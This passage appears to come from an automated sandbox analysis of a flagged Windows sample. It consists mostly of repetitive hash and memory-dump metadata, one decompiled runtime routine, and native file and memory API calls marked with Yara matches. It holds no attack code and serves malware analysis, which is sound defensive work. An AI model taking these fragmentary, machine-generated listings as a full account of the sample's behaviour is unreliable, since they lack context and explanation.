                                                                  • Instruction Fuzzy Hash: BA90027260501802D250715954147460045D7D0351F61C065A4054654D87958A66B6E1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.379112427.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 37da43d97c99ab5693bc27deb9310b6010727bbf12d948c92a7c3ff34d5cccd5
                                                                  • Instruction ID: bcfa2d3c86f402522076c547ff815ffd85be4ae883e8234d4cb7521bc2a0223c
                                                                  • Opcode Fuzzy Hash: 37da43d97c99ab5693bc27deb9310b6010727bbf12d948c92a7c3ff34d5cccd5
                                                                  • Instruction Fuzzy Hash: CD90027220505842D24071595404A460055D7D0355F61C065A4094694D96658D66F6A1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.379112427.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 4770aead8f91ff68ba623f8065ca09d13208e25c395d68aeca8ab809c0b3fd38
                                                                  • Instruction ID: f889f709246e2cdc42d769639b9ef382f05904cf78736c5a95b27794db9a8ebb
                                                                  • Opcode Fuzzy Hash: 4770aead8f91ff68ba623f8065ca09d13208e25c395d68aeca8ab809c0b3fd38
                                                                  • Instruction Fuzzy Hash: 1290027220145002D2407159944460B5045E7E0351F61C465E4455554C86558867E261
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.379112427.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 67312720f8308c2de271bab091dc28eb50fef309c22b28865be610fe51e0ff4d
                                                                  • Instruction ID: 1bca6a9010ad2ae18c616617553fb475fd7c17fb9c47485b9dc961269aad979b
                                                                  • Opcode Fuzzy Hash: 67312720f8308c2de271bab091dc28eb50fef309c22b28865be610fe51e0ff4d
                                                                  • Instruction Fuzzy Hash: A990026260501402D240715964187060055D7D0351F61D065A4054554DC6998A66B6E1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.379112427.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e5a5ee435f7272439db35e1229153f47fb02263bb7e178248b327e400190a9fd
                                                                  • Instruction ID: ed337d47fb915a4a2ff6a909b41e3e5108f3a55049479b067d50d5e7ea009236
                                                                  • Opcode Fuzzy Hash: e5a5ee435f7272439db35e1229153f47fb02263bb7e178248b327e400190a9fd
                                                                  • Instruction Fuzzy Hash: 5C900272301010529600A6996804A4A4145D7F0351B61D069A8044554C85948872A161
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.379112427.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e54efed5c68c6ae55fd03ee402f4284b047e4c5197f25a55a21e6b275210e3d1
                                                                  • Instruction ID: 71b4002038eab0014da4f1c6dd726621ddb8b20eedc6d004ecc4c70cfb15982c
                                                                  • Opcode Fuzzy Hash: e54efed5c68c6ae55fd03ee402f4284b047e4c5197f25a55a21e6b275210e3d1
                                                                  • Instruction Fuzzy Hash: 9A90026224101802D240715994147070046D7D0751F61C065A4054554D86568976B6F1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.379112427.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 278c820434238fbb31643024145e5e6e45da28b24eb35aeed290c26e246ec6db
                                                                  • Instruction ID: f3526e81a82497404a6cb9d2483da17108898e73a6fbafdd1628a663a87e54bc
                                                                  • Opcode Fuzzy Hash: 278c820434238fbb31643024145e5e6e45da28b24eb35aeed290c26e246ec6db
                                                                  • Instruction Fuzzy Hash: CD90026220505442D20065596408A060045D7D0355F61D065A5094595DC6758862F171
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.379112427.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: fd67235b229e63b79de0ecf3d413f8621644b91a381be3b442d6b095414ca8cb
                                                                  • Instruction ID: 467f360ce14fd5b74dae489610c6b39c32bb70f8ad835b7c7fd40a5fb28c685c
                                                                  • Opcode Fuzzy Hash: fd67235b229e63b79de0ecf3d413f8621644b91a381be3b442d6b095414ca8cb
                                                                  • Instruction Fuzzy Hash: 0A90027620505442D60065596804A870045D7D0355F61D465A445459CD86948872F161
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.379112427.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1229cd7e40c36d877fbb9fa13d2bd941af84eb6017a146e5ea70d494ea5c857c
                                                                  • Instruction ID: 7f462de4ae49f3f5178ce0e7846c0b46e699a8a4746bd24e912bf46adc43583d
                                                                  • Opcode Fuzzy Hash: 1229cd7e40c36d877fbb9fa13d2bd941af84eb6017a146e5ea70d494ea5c857c
                                                                  • Instruction Fuzzy Hash: FE90027220101403D200615965087070045D7D0351F61D465A4454558DD6968862B161
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.379112427.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                  • Instruction ID: 6543777ceaf0fd68972e27952e81246fdb243592efeac8130102c3b41dfda658
                                                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                  • Instruction Fuzzy Hash:
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  C-Code - Quality: 53%
                                                                  			E00B6FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                  				void* _t7;
                                                                  				intOrPtr _t9;
                                                                  				intOrPtr _t10;
                                                                  				intOrPtr* _t12;
                                                                  				intOrPtr* _t13;
                                                                  				intOrPtr _t14;
                                                                  				intOrPtr* _t15;
                                                                  
                                                                  				_t13 = __edx;
                                                                  				_push(_a4);
                                                                  				_t14 =  *[fs:0x18];
                                                                  				_t15 = _t12;
                                                                  				_t7 = E00B1CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                  				_push(_t13);
                                                                  				E00B65720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                  				_t9 =  *_t15;
                                                                  				if(_t9 == 0xffffffff) {
                                                                  					_t10 = 0;
                                                                  				} else {
                                                                  					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                  				}
                                                                  				_push(_t10);
                                                                  				_push(_t15);
                                                                  				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                  				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                  				return E00B65720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                  			}










                                                                  0x00b6fdda
                                                                  0x00b6fde2
                                                                  0x00b6fde5
                                                                  0x00b6fdec
                                                                  0x00b6fdfa
                                                                  0x00b6fdff
                                                                  0x00b6fe0a
                                                                  0x00b6fe0f
                                                                  0x00b6fe17
                                                                  0x00b6fe1e
                                                                  0x00b6fe19
                                                                  0x00b6fe19
                                                                  0x00b6fe19
                                                                  0x00b6fe20
                                                                  0x00b6fe21
                                                                  0x00b6fe22
                                                                  0x00b6fe25
                                                                  0x00b6fe40

                                                                  APIs
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B6FDFA
                                                                  Strings
                                                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 00B6FE2B
                                                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 00B6FE01
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.379112427.0000000000AB0000.00000040.00000001.sdmp, Offset: 00AB0000, based on PE: true
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                  • API String ID: 885266447-3903918235
                                                                  • Opcode ID: 69c6ea198ff6300bb8c8e5819e41eded2961d6c85d6f8154c072d74f2bf52e95
                                                                  • Instruction ID: 052a8b7edf803f6685686d94243027dd691b749f5d39ba244ab746988c770325
                                                                  • Opcode Fuzzy Hash: 69c6ea198ff6300bb8c8e5819e41eded2961d6c85d6f8154c072d74f2bf52e95
                                                                  • Instruction Fuzzy Hash: E4F0C232240601BBD6201A45DC02F73BF9AEB44730F250254F628565E1DA62BC7097A0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Executed Functions

                                                                  APIs
                                                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,00AE3BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00AE3BA7,007A002E,00000000,00000060,00000000,00000000), ref: 00AE821D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID: .z`
                                                                  • API String ID: 823142352-1441809116
                                                                  • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                  • Instruction ID: 582418c2f539d865020652f4ffce300d54e59ec4ef4640c710070cbd1455a60e
                                                                  • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                                                  • Instruction Fuzzy Hash: 9DF0B2B2200208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8118BA4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • NtReadFile.NTDLL(00AE3D62,5E972F59,FFFFFFFF,00AE3A21,?,?,00AE3D62,?,00AE3A21,FFFFFFFF,5E972F59,00AE3D62,?,00000000), ref: 00AE82C5
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FileRead
                                                                  • String ID:
                                                                  • API String ID: 2738559852-0
                                                                  • Opcode ID: 2db072141b2fb517564867f6653a7385569bd930fde16ee061a07a8defb5c1cd
                                                                  • Instruction ID: ae54ee0d7a418700d7301c9fa7e49f566a3c2f184c2482bc99f370476178c1c7
                                                                  • Opcode Fuzzy Hash: 2db072141b2fb517564867f6653a7385569bd930fde16ee061a07a8defb5c1cd
                                                                  • Instruction Fuzzy Hash: ACF0F4B2200108ABCB04DF99DC81EEB77A9EF8C754F018648BA1D97241DA30ED11CBA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • NtReadFile.NTDLL(00AE3D62,5E972F59,FFFFFFFF,00AE3A21,?,?,00AE3D62,?,00AE3A21,FFFFFFFF,5E972F59,00AE3D62,?,00000000), ref: 00AE82C5
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FileRead
                                                                  • String ID:
                                                                  • API String ID: 2738559852-0
                                                                  • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                  • Instruction ID: 972b728c9bff0ae1d83fb2a50d5c6f1510796d3077bb5f13f211d2b9f061cf49
                                                                  • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                                                  • Instruction Fuzzy Hash: 83F0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158648BA1D97241DA30E8118BA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00AD2D11,00002000,00003000,00000004), ref: 00AE83E9
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateMemoryVirtual
                                                                  • String ID:
                                                                  • API String ID: 2167126740-0
                                                                  • Opcode ID: 2d930a8eed96e5fe68c95cde19327b1941bce803f42fecf69ca9d9e01c7ba6c7
                                                                  • Instruction ID: 1b8cd52df7dd8d5fd3873f7c511c999697c99c148a072433d26fc727d5710649
                                                                  • Opcode Fuzzy Hash: 2d930a8eed96e5fe68c95cde19327b1941bce803f42fecf69ca9d9e01c7ba6c7
                                                                  • Instruction Fuzzy Hash: B1F039B5214189ABCB14DF99DCC4CE7B7A9FF88310B158B49FD4C97206C634E815CBA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00AD2D11,00002000,00003000,00000004), ref: 00AE83E9
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AllocateMemoryVirtual
                                                                  • String ID:
                                                                  • API String ID: 2167126740-0
                                                                  • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                  • Instruction ID: 93a74349d64f0de937f1bf6b19372a4e8c49d9c1cc289deb0ed64f522a5a8169
                                                                  • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                                                  • Instruction Fuzzy Hash: F1F015B2200208ABCB14DF89CC81EAB77ADAF88750F118648BE0897281C630F810CBA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • NtClose.NTDLL(00AE3D40,?,?,00AE3D40,00000000,FFFFFFFF), ref: 00AE8325
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.593224155.0000000000AD0000.00000040.00000001.sdmp, Offset: 00AD0000, based on PE: false
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Close
                                                                  • String ID:
                                                                  • API String ID: 3535843008-0
                                                                  • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                  • Instruction ID: 16a9c6d562c44ab3296e5b0654de4a970812c6a994df038f38fb08ae301a2aaa
                                                                  • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                  • Instruction Fuzzy Hash: 34D012752002186BD710EF99CC85E97775CEF44750F154555BA1C5B282C570F90086E0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.595219970.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                  • Associated: 00000005.00000002.595539917.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                  • Associated: 00000005.00000002.595609255.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 505decdac9093f10dfe6593ebb11ef350665fb079d715a3ee1176c3c6af10f10
                                                                  • Instruction ID: 17f977dd307ce3f9d1dbcee86cf176a90f1d581703ee9d937433c2f74a40a691
                                                                  • Opcode Fuzzy Hash: 505decdac9093f10dfe6593ebb11ef350665fb079d715a3ee1176c3c6af10f10
                                                                  • Instruction Fuzzy Hash: 079002A120201007610571594514616401B97F4259B61C021E51055A0DC565D8D17165
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.595219970.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                  • Associated: 00000005.00000002.595539917.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                  • Associated: 00000005.00000002.595609255.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 3267a6dfa128df0e6de9648e3ffa3b383c6106a84ebb6c6ed36bfdc42011a4c8
                                                                  • Instruction ID: bbb5859cb6e60baefb3ac6d253f2e18fbf1fa3e7b783202d7953f4e648f2cf94
                                                                  • Opcode Fuzzy Hash: 3267a6dfa128df0e6de9648e3ffa3b383c6106a84ebb6c6ed36bfdc42011a4c8
                                                                  • Instruction Fuzzy Hash: 34900265211010072105A5590704507005797E93A9361C021F5106560CD661D8A17161
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.595219970.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                  • Associated: 00000005.00000002.595539917.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                  • Associated: 00000005.00000002.595609255.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 64e867d97bcf77e3d59679b5f59979e488b39c2811b5b182155da1998a162890
                                                                  • Instruction ID: 33b59fb1c6db069cc111d0282dd1ecbafc2a7cb7db33cfb507dc38c9ce34ab2b
                                                                  • Opcode Fuzzy Hash: 64e867d97bcf77e3d59679b5f59979e488b39c2811b5b182155da1998a162890
                                                                  • Instruction Fuzzy Hash: 9290027120101846F10061594504B46001697F4359F61C016E4215664D8655D8917561
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.595219970.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                  • Associated: 00000005.00000002.595539917.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                  • Associated: 00000005.00000002.595609255.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 74a5ae90ebf3318e93e28d29e09a7397bf05ac9858045d672a96042e6ebe6fbc
                                                                  • Instruction ID: 5c7765ed79b1ebb89d4ba767fee6bebd35266a57f476115fa87770f948aa74aa
                                                                  • Opcode Fuzzy Hash: 74a5ae90ebf3318e93e28d29e09a7397bf05ac9858045d672a96042e6ebe6fbc
                                                                  • Instruction Fuzzy Hash: AA90027120109806F1106159850474A001697E4359F65C411E8515668D86D5D8D17161
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.595219970.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                  • Associated: 00000005.00000002.595539917.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                  • Associated: 00000005.00000002.595609255.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 285c06eb303027de748d58b3fa4f5bbecc8cd45c6e4e2cac64d03e970a282fba
                                                                  • Instruction ID: 768156a74d57c54b1c1ff2466abaddcb5a3b920c80bb7c8ece55d4a5cb65ef97
                                                                  • Opcode Fuzzy Hash: 285c06eb303027de748d58b3fa4f5bbecc8cd45c6e4e2cac64d03e970a282fba
                                                                  • Instruction Fuzzy Hash: 2D90027120505846F14071594504A46002697E435DF61C011E41556A4D9665DD95B6A1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.595219970.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                  • Associated: 00000005.00000002.595539917.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                  • Associated: 00000005.00000002.595609255.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 18455dacf9fc5689fb3b3fd08cc6dcd0ff075926e61244b289f473667c74fa06
                                                                  • Instruction ID: afa35d17ecc795716f9e49a8ef86afc609ee31ad5e260d58bf297131d718fa3b
                                                                  • Opcode Fuzzy Hash: 18455dacf9fc5689fb3b3fd08cc6dcd0ff075926e61244b289f473667c74fa06
                                                                  • Instruction Fuzzy Hash: D090027120101806F1807159450464A001697E5359FA1C015E4116664DCA55DA9977E1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.595219970.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                  • Associated: 00000005.00000002.595539917.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                  • Associated: 00000005.00000002.595609255.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 2bd34c4379138296ab72f7214f7760f4662b754b8e37c13b43a7b38f21dd6035
                                                                  • Instruction ID: f57bc53d3ccf723b7d9ac2d809e989f6a6817f9300f685a89c893b3219993857
                                                                  • Opcode Fuzzy Hash: 2bd34c4379138296ab72f7214f7760f4662b754b8e37c13b43a7b38f21dd6035
                                                                  • Instruction Fuzzy Hash: 8C90027131115406F11061598504706001697E5259F61C411E4915568D86D5D8D17162
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.595219970.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                  • Associated: 00000005.00000002.595539917.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                  • Associated: 00000005.00000002.595609255.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 3e27469537591378dd44b4b8df3d1ca190389423e95b8bf1d78beb84fbe4cbaa
                                                                  • Instruction ID: 8f11565d318c79732533715f74a95f848a510b7d9152f0bdd8cb91430a069a4d
                                                                  • Opcode Fuzzy Hash: 3e27469537591378dd44b4b8df3d1ca190389423e95b8bf1d78beb84fbe4cbaa
                                                                  • Instruction Fuzzy Hash: 1F90026921301006F1807159550860A001697E525AFA1D415E4106568CC955D8A97361
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.595219970.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                  • Associated: 00000005.00000002.595539917.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                  • Associated: 00000005.00000002.595609255.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: baa658a5bae22d70a12ada4f27c35fef87c3a8f8f3520cf2568404409d92cde0
                                                                  • Instruction ID: 639b6f4be135b1d452e0abc32425a09d60cc3215053d157942964699501c6c0c
                                                                  • Opcode Fuzzy Hash: baa658a5bae22d70a12ada4f27c35fef87c3a8f8f3520cf2568404409d92cde0
                                                                  • Instruction Fuzzy Hash: 2C90027120101406F10065995508646001697F4359F61D011E9115565EC6A5D8D17171
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.595219970.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                  • Associated: 00000005.00000002.595539917.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                  • Associated: 00000005.00000002.595609255.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 8e5eee3642f49164936aa773e869017df444721d2e72067c0946b1f1d046cf89
                                                                  • Instruction ID: 45096513465528e2ccc9817ae2805fe58cfa11d681766da70360c2f77d403544
                                                                  • Opcode Fuzzy Hash: 8e5eee3642f49164936aa773e869017df444721d2e72067c0946b1f1d046cf89
                                                                  • Instruction Fuzzy Hash: BD900261242051567545B15945045074017A7F42997A1C012E5505960C8566E896F661
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.595219970.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                  • Associated: 00000005.00000002.595539917.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                  • Associated: 00000005.00000002.595609255.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: b84db1945b14f357b9ffa16c3a157cdd61dda8f3c7f055c6c63cb61c324ef0ba
                                                                  • Instruction ID: 87cbeafdeac7ab67303267e49320508171c3fd3ad6f1a9af703075386dbed11e
                                                                  • Opcode Fuzzy Hash: b84db1945b14f357b9ffa16c3a157cdd61dda8f3c7f055c6c63cb61c324ef0ba
                                                                  • Instruction Fuzzy Hash: 9390027120101417F11161594604707001A97E4299FA1C412E4515568D9696D992B161
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.595219970.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                  • Associated: 00000005.00000002.595539917.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                  • Associated: 00000005.00000002.595609255.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: dfadb1390327239bdaf7a0d8cc11a4d15dfa32bcff9c2baef0839e54f84e01d0
                                                                  • Instruction ID: c802c08f6d589b8915b9b4ec0d7b283598760b73cfe0a6c2b001e169f1084c13
                                                                  • Opcode Fuzzy Hash: dfadb1390327239bdaf7a0d8cc11a4d15dfa32bcff9c2baef0839e54f84e01d0
                                                                  • Instruction Fuzzy Hash: DE9002A134101446F10061594514B060016D7F5359F61C015E5155564D8659DC927166
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.595219970.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                  • Associated: 00000005.00000002.595539917.0000000004DCB000.00000040.00000001.sdmp Download File
                                                                  • Associated: 00000005.00000002.595609255.0000000004DCF000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID: InitializeThunk
                                                                  • String ID:
                                                                  • API String ID: 2994545307-0
                                                                  • Opcode ID: 606a815e125773eae02cf33fd9c575e39ce4feaf9de53102b532fad40bae9b41
                                                                  • Instruction ID: 49daf335a5d9fa823c2645eedfe3712ad623f89e2b89750ab51764793484c9a1
                                                                  • Opcode Fuzzy Hash: 606a815e125773eae02cf33fd9c575e39ce4feaf9de53102b532fad40bae9b41
                                                                  • Instruction Fuzzy Hash: FB9002B120101406F14071594504746001697E4359F61C011E9155564E8699DDD576A5
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000005.00000002.595219970.0000000004CB0000.00000040.00000001.sdmp, Offset: 04CB0000, based on PE: true
                                                                  • Associated: 00000005.00000002.595539917.0000000004DCB000.00000040.00000001.sdmp Download File
